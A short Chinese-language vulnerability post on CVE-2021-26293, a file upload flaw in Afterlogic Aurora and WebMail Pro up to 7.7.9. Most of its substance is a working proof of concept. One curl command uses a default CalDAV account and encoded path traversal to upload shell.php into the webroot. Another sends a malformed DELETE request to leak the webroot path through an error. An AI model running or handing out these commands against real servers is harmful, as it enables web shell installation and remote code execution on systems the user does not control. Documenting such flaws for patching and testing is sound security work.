Afterlogic Aurora & WebMail Pro 文件上传漏洞(CVE-2021-26293)

发布于 2025-03-12 07:40:52 字数 1963 浏览 5 评论 0

该漏洞是由于 Afterlogic Aurora & WebMail Pro 中对上传的文件过滤和限制存在缺陷,攻击者可以通过上传恶意文件,从而执行任意代码。

影响版本:

  • WebMail Pro ≤ 7.7.9
  • Afterlogic Aurora ≤ 7.7.9

PoC:

curl -T shell.php -u 'caldav_public_user@localhost:caldav_public_user' "https://sample-mail.tld/dav/server.php/files/persona/%2e%2e/%2e%2e//%2e%2e//%2e%2e/data//%2e%2e//%2e%2e//%2e%2e//%2e%2e//%2e%2e//%2e%2e//%2e%2e//%2e%2e//%2e%2e//%2e%2e//%2e%2e//%2e%2e//%2e%2e//%2e%2e//%2e%2e//%2e%2e//%2e%2e//%2e%2e//%2e%2e//%2e%2e//%2e%2e//%2e%2e//%2e%2e/var/www/html/shell.php"

默认路径为/var/www/html,也可能更改配置为其它路径,可以尝试其它方式获取。

curl -X DELETE -u 'caldav_public_user@localhost:caldav_public_user' "https://sample-mail.tld/dav/server.php/files/personal/GIVE_ME_ERROR_TO_GET_DOC_ROOT_2021"
//使用无效路径获取 SabreDAV 错误查看 Webroot 路径

ref:

如果你对这篇内容有疑问,欢迎到本站社区发帖提问 参与讨论,获取更多帮助,或者扫码二维码加入 Web 技术交流群。

扫码二维码加入Web技术交流群

发布评论

需要 登录 才能够评论, 你可以免费 注册 一个本站的账号。
列表为空,暂无数据

关于作者

も星光

暂无简介

文章
评论
28 人气
更多

推荐作者

颉】

文章 0 评论 0

hiasdf

文章 0 评论 0

过期以后

文章 0 评论 0

悲歌长辞

文章 0 评论 0

梦归所梦

文章 0 评论 0

梦境

文章 0 评论 0

    我们使用 Cookies 和其他技术来定制您的体验包括您的登录状态等。通过阅读我们的 隐私政策 了解更多相关信息。 单击 接受 或继续使用网站,即表示您同意使用 Cookies 和您的相关数据。
    原文